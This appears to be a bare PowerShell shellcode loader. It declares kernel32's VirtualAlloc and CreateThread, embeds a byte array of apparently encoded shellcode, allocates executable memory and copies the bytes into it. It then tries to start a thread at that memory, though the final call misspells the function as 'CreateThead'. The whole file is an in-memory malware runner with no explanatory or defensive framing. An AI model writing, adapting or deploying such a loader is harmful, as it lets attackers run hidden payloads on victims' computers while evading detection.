﻿$Kernel32 = @"
using System;
using System.Runtime.InteropServices;

public class Kernel32 {
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@

Add-Type $Kernel32

[Byte[]] $buf = 0xfd,0x93,0x9f,0x99,0x43,0x4b,0x99,0x40,0xf9,0x37,0x42,0x41,0x43,0x9f,0xf5,0x40,0x9b,0xfc,0x91,0x40,0xba,0xdf,0xcc,0x95,0xec,0xda,0xc8,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,0x5f,0x31,0x50,0x15,0x83,0xc0,0x4,0x3,0x50,0x11,0xe2,0x2a,0x30,0x7d,0x6e,0xd4,0xc9,0x7e,0xf,0x5d,0x2c,0x4f,0xf,0x39,0x24,0xe0,0xbf,0x4a,0x68,0xd,0x4b,0x1e,0x99,0x86,0x39,0xb6,0xae,0x2f,0xf7,0xe0,0x81,0xb0,0xa4,0xd0,0x80,0x32,0xb7,0x4,0x63,0xa,0x78,0x59,0x62,0x4b,0x65,0x93,0x36,0x4,0xe1,0x1,0xa7,0x21,0xbf,0x99,0x4c,0x79,0x51,0x99,0xb1,0xca,0x50,0x88,0x67,0x40,0xb,0xa,0x89,0x85,0x27,0x3,0x91,0xca,0x2,0xda,0x2a,0x38,0xf8,0xdd,0xfa,0x70,0x1,0x71,0xc3,0xbc,0xf0,0x88,0x3,0x7a,0xeb,0xff,0x7d,0x78,0x96,0x7,0xba,0x2,0x4c,0x82,0x59,0xa4,0x7,0x34,0x86,0x54,0xcb,0xa2,0x4d,0x5a,0xa0,0xa1,0xa,0x7f,0x37,0x66,0x21,0x7b,0xbc,0x89,0xe6,0xd,0x86,0xad,0x22,0x55,0x5c,0xcc,0x73,0x33,0x33,0xf1,0x64,0x9c,0xec,0x57,0xee,0x31,0xf8,0xea,0xad,0x5d,0x90,0x91,0x39,0x9e,0x4,0x2e,0xab,0xf0,0xbd,0x84,0x43,0x41,0x49,0x2,0x93,0xa6,0x60,0xa2,0x92,0x58,0x8b,0x32,0xcd,0x2c,0xff,0x42,0x37,0xe2,0xd0,0x98,0x47,0xa5,0x1f,0x23,0x10,0x1,0x31,0xb1,0x9c,0xc3,0xb1,0x2d,0x99,0x45,0xcb,0xa,0x22,0xbc,0xc2,0x35,0xdd,0x3f,0x15,0xee,0xec,0xf6,0x44,0x41,0x65,0xa,0x36,0x30,0x11,0xb7,0xb9,0xb2,0xe1,0x94,0xe9,0xda,0xb6,0x93,0x95,0xdc,0xc6,0x71,0x20,0x26,0xd3,0x32,0x6a,0x97,0xf6,0x91,0xe4,0xd7,0xc4,0xb5,0x71,0x85,0x7a,0xe4,0x28,0x7b,0x2d,0x60,0x20,0x2e,0xff,0x4b,0x49,0x5,0x76,0x6d,0xdf,0xb5,0xd2,0x1a,0xa0,0x86,0xe4,0xda,0x29,0x8,0x8e,0xde,0x79,0xa2,0x50,0x89,0x11,0x47,0x29,0xab,0x64,0x58,0x60,0xe2,0x97,0xf1,0xdc,0x52,0x3f,0xab,0x8a,0x71,0xb9,0x4b,0x30,0x75,0x10,0xee,0x6,0xfc,0x81,0xbb,0xf2,0xef,0x5e,0xee,0x10,0x46,0x49,0xa3,0x18,0xa6,0x76,0xec,0xa3,0x6f,0xa4,0xa7,0x74,0x90,0xde,0xb7,0x3e,0x32,0x48,0xc8,0x94,0x59,0x35,0x5e,0x17,0x8e,0xb5,0x9e,0x7f,0xae,0xb5,0xde,0x7f,0xf9,0xdd,0x86,0xdb,0x56,0xfb,0xc9,0xf1,0xca,0x50,0x66,0x73,0xb,0x1,0xe0,0x83,0xf4,0xae,0xf0,0xd0,0xa2,0xc6,0xe2,0x40,0xc3,0xf5,0xfd,0xb8,0x51,0x39,0x75,0x8e,0xd1,0xbd,0x74,0xd3,0x63,0x1,0x3,0x36,0x33,0x41,0x3,0xf7,0x3b,0xba,0x2c,0x39,0xf4,0x6b,0xe3,0xa,0xda,0x42,0x33,0x45,0x17,0xa5
$size = $buf.Length 
[IntPtr]$addr = [kernel32]::VirtualAlloc(0,$size,0x3000,0x40);
[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$addr,$size)
$thandle=[kernel32]::CreateThead(0,0,$addr,0,0,0);